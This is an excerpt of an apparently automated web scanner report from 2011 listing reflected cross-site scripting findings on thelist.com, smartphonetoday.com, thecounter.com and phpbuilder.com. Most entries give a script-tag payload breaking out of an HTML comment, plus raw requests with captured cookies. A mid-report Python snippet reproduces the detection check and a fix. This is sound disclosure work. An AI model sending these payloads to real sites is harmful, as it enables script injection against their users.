GET /welcomeadfb26c--><script>alert(1)</script>a4e106c783c/ HTTP/1.1
Host: www.phpbuilder.com
Proxy-Connection: keep-alive
Referer: http://www.phpbuilder.com/?7640d--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eeb4ef76d865=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QUADIDX=107; intmintc__welcome; toURL=http%3A//www.phpbuilder.com/%3F7640d--%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253Eeb4ef76d865%3D1

Response

HTTP/1.1 404 Not Found
Date: Fri, 18 Feb 2011 15:20:30 GMT
Server: Apache
Content-Type: text/html
Content-Length: 43262


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <title>PHPBuilder.com, the best reso
...[SNIP]...
<!-- house_ribbon: Missing QUAD ads for page_type: index on path www.phpbuilder.com with position T
url: /welcomeadfb26c--><script>alert(1)</script>a4e106c783c/ -->
...[SNIP]...

3.116. http://www.smartphonetoday.com/ [10d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E11ae5b1cf82 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartphonetoday.com
Path:   /

Issue detail

The value of the 10d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E11ae5b1cf82 request parameter is copied into an HTML comment. The payload e3c0e--><script>alert(1)</script>db344f8e464 was submitted in the 10d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E11ae5b1cf82 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /?10d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E11ae5b1cf82=1e3c0e--><script>alert(1)</script>db344f8e464 HTTP/1.1
Host: www.smartphonetoday.com
Proxy-Connection: keep-alive
Referer: http://www.smartphonetoday.com/welcomead/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QUADIDX=107; intmintc__welcome; toURL=http%3A//www.smartphonetoday.com/%3F10d85--%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253E11ae5b1cf82%3D1; qsg=14508

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 15:19:21 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 15:20:21 GMT
Content-Type: text/html
Content-Length: 85506

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
<HEAD>
<TITLE>SmartPhone Today - The Complete Independent SmartPhone Information Resource </TITLE>
<META name="description" content="The Inte
...[SNIP]...
<!-- marketplace04: Missing QUAD ads for page_type: other on path www.smartphonetoday.com with position E1
url: /?10d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E11ae5b1cf82=1e3c0e--><script>alert(1)</script>db344f8e464 -->
...[SNIP]...

3.117. http://www.smartphonetoday.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartphonetoday.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 10d85--><script>alert(1)</script>11ae5b1cf82 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /?10d85--><script>alert(1)</script>11ae5b1cf82=1 HTTP/1.1
Host: www.smartphonetoday.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 14:57:52 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 14:58:52 GMT
Connection: close
Content-Type: text/html
Content-Length: 84610

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
<HEAD>
<TITLE>SmartPhone Today - The Complete Independent SmartPhone Information Resource </TITLE>
<META name="description" content="The Inte
...[SNIP]...
<!-- marketplace04: Missing QUAD ads for page_type: other on path www.smartphonetoday.com with position E1
url: /?10d85--><script>alert(1)</script>11ae5b1cf82=1 -->
...[SNIP]...

3.118. http://www.thecounter.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thecounter.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 6955f--><script>alert(1)</script>e525c47aab4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /?6955f--><script>alert(1)</script>e525c47aab4=1 HTTP/1.1
Host: www.thecounter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 15:00:56 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 41197

<html>
<head>
<title>TheCounter.com - The Affordable Web Site Analysis Tool</title>
<!-- test test -->

<LINK REL="stylesheet" HREF="/css/text.css" TYPE="text/css">
<meta http-equiv="Content-Type" con
...[SNIP]...
<!-- : Missing QUAD ads for page_type: other on path www.thecounter.com with position ciu
url: /?6955f--><script>alert(1)</script>e525c47aab4=1 -->
...[SNIP]...

3.119. http://www.thelist.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thelist.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 6fd89--><script>alert(1)</script>3e9f72d52de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /?6fd89--><script>alert(1)</script>3e9f72d52de=1 HTTP/1.1
Host: www.thelist.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 12:47:03 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 12:48:03 GMT
Content-Type: text/html
Content-Length: 46036

<HTML>
<HEAD>
<TITLE>The List: The Definitive Internet Services Buyer's Guide</TITLE>
<META NAME="description" CONTENT="Find an ISP that fits your internet access needs on TheList.com. TheList.com is
...[SNIP]...
<!-- sitetext-1: Missing QUAD ads for page_type: other on path www.thelist.com with position S1
url: /?6fd89--><script>alert(1)</script>3e9f72d52de=1 -->
...[SNIP]...

3.120. http://www.thelist.com/HTML/5/2349355.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thelist.com
Path:   /HTML/5/2349355.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 236a8--><script>alert(1)</script>8d68ddba170 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /HTML/5/2349355.html?236a8--><script>alert(1)</script>8d68ddba170=1 HTTP/1.1
Host: www.thelist.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QUADIDX=107; qsg=14508; __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026063098:ss=1298026063098; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; __utmc=219744476; __utmb=219744476.2.10.1298033251; _bizo_cksm_crc32=B0104A9B; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; _bizo_cksm=1260A44F5CFBD6E0; _bizo_np_stats=107%3D64%2C217%3D123%2C224%3D2442%2C155%3D6270%2C

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 12:48:39 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 12:49:39 GMT
Content-Type: text/html
Content-Length: 45210

<HTML>
<HEAD>
<TITLE>The List: The Definitive Internet Services Buyer's Guide</TITLE>

<script language="javascript" src="http://e1.cdn.qnsr.com/cgi/d/0/0/203/630903/cmp0.js"></script>
<script langua
...[SNIP]...
<!-- sitetext-1: Missing QUAD ads for page_type: other on path www.thelist.com with position S1
url: /HTML/5/2349355.html?236a8--><script>alert(1)</script>8d68ddba170=1 -->
...[SNIP]...

3.121. http://www.thelist.com/HTML/7/2331187.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thelist.com
Path:   /HTML/7/2331187.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 3a773--><script>alert(1)</script>cf39e5ac2b3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /HTML/7/2331187.html?3a773--><script>alert(1)</script>cf39e5ac2b3=1 HTTP/1.1
Host: www.thelist.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QUADIDX=107; qsg=14508; __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026063098:ss=1298026063098; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; __utmc=219744476; __utmb=219744476.2.10.1298033251; _bizo_cksm_crc32=B0104A9B; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; _bizo_cksm=1260A44F5CFBD6E0; _bizo_np_stats=107%3D64%2C217%3D123%2C224%3D2442%2C155%3D6270%2C

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 12:48:52 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 12:49:52 GMT
Content-Type: text/html
Content-Length: 44681

<HTML>
<HEAD>
<TITLE>The List: The Definitive Internet Services Buyer's Guide</TITLE>

<script src="/icom_includes/quad/thelist/config.js"></script>
<script src="/icom_includes/quad/QUAD_AD.js"></scr
...[SNIP]...
<!-- sitetext-1: Missing QUAD ads for page_type: other on path www.thelist.com with position S1
url: /HTML/7/2331187.html?3a773--><script>alert(1)</script>cf39e5ac2b3=1 -->
...[SNIP]...

3.122. http://www.thelist.com/add.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thelist.com
Path:   /add.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload d2f7f--><script>alert(1)</script>c4dfa717f01 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /add.php?d2f7f--><script>alert(1)</script>c4dfa717f01=1 HTTP/1.1
Host: www.thelist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _bizo_cksm_crc32=63F05AC3; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026164021:ss=1298026063098; QUADIDX=107; __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; qsg=14508; _bizo_np_stats=107%3D65%2C221%3D89%2C224%3D1157%2C155%3D1344%2C; __utmc=219744476; __utmb=219744476.8.10.1298033251; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 14:52:30 GMT
Server: Apache
Set-Cookie: PHPSESSID=b6743747b67654794e4b7778bff3bbae; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 47159


<HTML>
<HEAD>
<TITLE>The List: The Definitive Internet Services Buyer's Guide</TITLE>
<script language="javascript" src="http://e1.cdn.qnsr.com/cgi/d/0/0/203/630903/cmp0.js"></script>
<script langua
...[SNIP]...
<!-- sitetext-1: Missing QUAD ads for page_type: other on path www.thelist.com with position S1
url: /add.php?d2f7f--><script>alert(1)</script>c4dfa717f01=1 -->
...[SNIP]...
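
Added example, not part of the scanner report or of thelist.com's code: the comment-context check that this entry and the other "copied into an HTML comment" entries (3.123 through 3.130 and 3.133) rely on, reproduced in Python. It rebuilds the "url:" debugging comment from the response fragment above, generates a probe of the same shape as the report's (5 hex characters, the "-->" breakout, the script, 11 hex characters), classifies the reflection the way the report does (reflected, reflected unmodified, and whether the injected script lands outside every comment, where a browser will run it), and shows a neutraliser for comment content. The template string, the function names and the "&#45;" replacement are my assumptions; the better fix is the one the remediation detail already gives, which is to stop echoing the request URL into the page at all.

```python
"""Reflected XSS in an HTML comment: the scanner's check, and a neutraliser.

Assumptions (not from the report): the COMMENT_TEMPLATE string, the function
names, and the '&#45;' replacement used by comment_safe().
"""
from __future__ import annotations

import re
import secrets
from typing import NamedTuple

SCRIPT = "<script>alert(1)</script>"

# Sink reconstructed from the response fragment: the request URL is pasted raw
# into an ad-placement debugging comment.
COMMENT_TEMPLATE = (
    "<!-- sitetext-1: Missing QUAD ads for page_type: other on path "
    "www.thelist.com with position S1\nurl: {url} -->\n"
)


class Probe(NamedTuple):
    prefix: str   # random marker before the payload, e.g. 'd2f7f'
    text: str     # the whole string sent as the parameter name
    suffix: str   # random marker after the payload, e.g. 'c4dfa717f01'


def make_probe(breakout: str = "-->") -> Probe:
    """Build a probe shaped like the report's: 5 random hex chars, the context
    breakout, the script, 11 random hex chars. The random markers let the
    checker find this exact reflection and ignore pre-existing page content."""
    prefix = secrets.token_hex(3)[:5]
    suffix = secrets.token_hex(6)[:11]
    return Probe(prefix, prefix + breakout + SCRIPT + suffix, suffix)


def comment_safe(value: str) -> str:
    """Neutralise a value for inclusion inside an HTML comment.

    Entities are not decoded inside comments, so encoding cannot help. The only
    sequences that can end a comment are '--' (also '--!>') and a '>' or '->'
    directly after '<!--'. Replacing every '-' with the literal text '&#45;'
    (displayed as-is inside the comment) removes all of them; a leading '>' is
    pushed away from the opener with a space.
    """
    value = value.replace("-", "&#45;")
    if value.startswith(">"):
        value = " " + value
    return value


def render(url: str, hardened: bool) -> str:
    """The page's comment with the URL echoed raw (as observed) or neutralised."""
    return COMMENT_TEMPLATE.replace("{url}", comment_safe(url) if hardened else url)


# Simplified tokenizer rule: a comment ends at the first '-->' after '<!--'.
_COMMENT = re.compile(r"<!--.*?-->", re.S)


def probe_result(body: str, probe: Probe) -> dict[str, bool]:
    """Classify a response as the report does: reflected at all, reflected
    unmodified, and does the injected <script> land outside every comment
    (where the browser will execute it)?"""
    m = re.search(re.escape(probe.prefix) + r"(.*?)" + re.escape(probe.suffix), body, re.S)
    if not m:
        return {"reflected": False, "unmodified": False, "script_executes": False}
    sent = probe.text[len(probe.prefix):len(probe.text) - len(probe.suffix)]
    comments = [c.span() for c in _COMMENT.finditer(body)]
    script_at = body.find(SCRIPT, m.start())
    inside = any(a <= script_at < b for a, b in comments)
    return {
        "reflected": True,
        "unmodified": m.group(1) == sent,
        "script_executes": script_at != -1 and not inside,
    }


if __name__ == "__main__":
    # The probe from issue 3.122, against the raw and the neutralised comment.
    page_probe = Probe("d2f7f", "d2f7f" + "-->" + SCRIPT + "c4dfa717f01", "c4dfa717f01")
    url = "/add.php?" + page_probe.text + "=1"
    print("raw      ", probe_result(render(url, hardened=False), page_probe))
    print("hardened ", probe_result(render(url, hardened=True), page_probe))
```

Run as-is it reports the raw comment as reflected, unmodified and executing, and the neutralised one as reflected but modified and inert: the script text is still present, but the browser never leaves the comment. The classification is what separates a real finding from a harmless echo, which is why the report states both "echoed unmodified" and the context for every entry.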

3.123. http://www.thelist.com/areacode.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thelist.com
Path:   /areacode.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 74a93--><script>alert(1)</script>e34ffffc7c6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /areacode.html?74a93--><script>alert(1)</script>e34ffffc7c6=1 HTTP/1.1
Host: www.thelist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _bizo_cksm_crc32=63F05AC3; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026164021:ss=1298026063098; QUADIDX=107; __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; qsg=14508; _bizo_np_stats=107%3D65%2C221%3D89%2C224%3D1157%2C155%3D1344%2C; __utmc=219744476; __utmb=219744476.8.10.1298033251; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 14:52:33 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 14:53:33 GMT
Connection: close
Content-Type: text/html
Content-Length: 58520

<HTML>
<HEAD>
<TITLE>The List: The Definitive Internet Services Buyer's Guide</TITLE>

<script language="javascript" src="http://e1.cdn.qnsr.com/cgi/d/0/0/203/630903/cmp0.js"></script>
<script langua
...[SNIP]...
<!-- sitetext-1: Missing QUAD ads for page_type: other on path www.thelist.com with position S1
url: /areacode.html?74a93--><script>alert(1)</script>e34ffffc7c6=1 -->
...[SNIP]...

3.124. http://www.thelist.com/countrycode.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thelist.com
Path:   /countrycode.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 30741--><script>alert(1)</script>8e229fc5059 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /countrycode.html?30741--><script>alert(1)</script>8e229fc5059=1 HTTP/1.1
Host: www.thelist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _bizo_cksm_crc32=63F05AC3; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026164021:ss=1298026063098; QUADIDX=107; __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; qsg=14508; _bizo_np_stats=107%3D65%2C221%3D89%2C224%3D1157%2C155%3D1344%2C; __utmc=219744476; __utmb=219744476.8.10.1298033251; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 14:52:35 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 14:53:35 GMT
Connection: close
Content-Type: text/html
Content-Length: 70479

<HTML>
<HEAD>
<script language="javascript" src="http://e1.cdn.qnsr.com/cgi/d/0/0/203/630903/cmp0.js"></script>
<script language="javascript" src="http://e1.cdn.qnsr.com/jsc/e1/fx.js"></script>
<scrip
...[SNIP]...
<!-- sitetext-1: Missing QUAD ads for page_type: other on path www.thelist.com with position S1
url: /countrycode.html?30741--><script>alert(1)</script>8e229fc5059=1 -->
...[SNIP]...

3.125. http://www.thelist.com/index.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thelist.com
Path:   /index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload eff60--><script>alert(1)</script>398ed0a3768 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /index.html?eff60--><script>alert(1)</script>398ed0a3768=1 HTTP/1.1
Host: www.thelist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _bizo_cksm_crc32=63F05AC3; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026164021:ss=1298026063098; QUADIDX=107; __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; qsg=14508; _bizo_np_stats=107%3D65%2C221%3D89%2C224%3D1157%2C155%3D1344%2C; __utmc=219744476; __utmb=219744476.8.10.1298033251; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 14:52:31 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 14:53:31 GMT
Connection: close
Content-Type: text/html
Content-Length: 46084

<HTML>
<HEAD>
<TITLE>The List: The Definitive Internet Services Buyer's Guide</TITLE>
<META NAME="description" CONTENT="Find an ISP that fits your internet access needs on TheList.com. TheList.com is
...[SNIP]...
<!-- sitetext-1: Missing QUAD ads for page_type: other on path www.thelist.com with position S1
url: /index.html?eff60--><script>alert(1)</script>398ed0a3768=1 -->
...[SNIP]...

3.126. http://www.thelist.com/misc/canada/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thelist.com
Path:   /misc/canada/

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload d970c--><script>alert(1)</script>4f484edfe23 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /misc/canada/?d970c--><script>alert(1)</script>4f484edfe23=1 HTTP/1.1
Host: www.thelist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _bizo_cksm_crc32=63F05AC3; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026164021:ss=1298026063098; QUADIDX=107; __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; qsg=14508; _bizo_np_stats=107%3D65%2C221%3D89%2C224%3D1157%2C155%3D1344%2C; __utmc=219744476; __utmb=219744476.8.10.1298033251; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 14:52:33 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 14:53:33 GMT
Connection: close
Content-Type: text/html
Content-Length: 56546

<HTML>
<HEAD>
<TITLE>
Canadian Nationwide ISPs
</TITLE>

<script language="javascript" src="http://e1.cdn.qnsr.com/cgi/d/0/0/203/630903/cmp0.js"></script>
<script language="javascript" src="http:/
...[SNIP]...
<!-- sitetext-1: Missing QUAD ads for page_type: other on path www.thelist.com with position S1
url: /misc/canada/?d970c--><script>alert(1)</script>4f484edfe23=1 -->
...[SNIP]...

3.127. http://www.thelist.com/misc/usa/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thelist.com
Path:   /misc/usa/

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 54029--><script>alert(1)</script>63b507b24db was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /misc/usa/?54029--><script>alert(1)</script>63b507b24db=1 HTTP/1.1
Host: www.thelist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _bizo_cksm_crc32=63F05AC3; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026164021:ss=1298026063098; QUADIDX=107; __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; qsg=14508; _bizo_np_stats=107%3D65%2C221%3D89%2C224%3D1157%2C155%3D1344%2C; __utmc=219744476; __utmb=219744476.8.10.1298033251; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 14:52:52 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 14:53:52 GMT
Connection: close
Content-Type: text/html
Content-Length: 73083

<HTML>
<HEAD>
<TITLE>
U.S. Nationwide ISPs
</TITLE>

<script language="javascript" src="http://e1.cdn.qnsr.com/cgi/d/0/0/203/630903/cmp0.js"></script>
<script language="javascript" src="http://e1.
...[SNIP]...
<!-- sitetext-1: Missing QUAD ads for page_type: other on path www.thelist.com with position S1
url: /misc/usa/?54029--><script>alert(1)</script>63b507b24db=1 -->
...[SNIP]...

3.128. http://www.thelist.com/update.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thelist.com
Path:   /update.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 2c2ad--><script>alert(1)</script>4971a9e3236 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /update.php?2c2ad--><script>alert(1)</script>4971a9e3236=1 HTTP/1.1
Host: www.thelist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
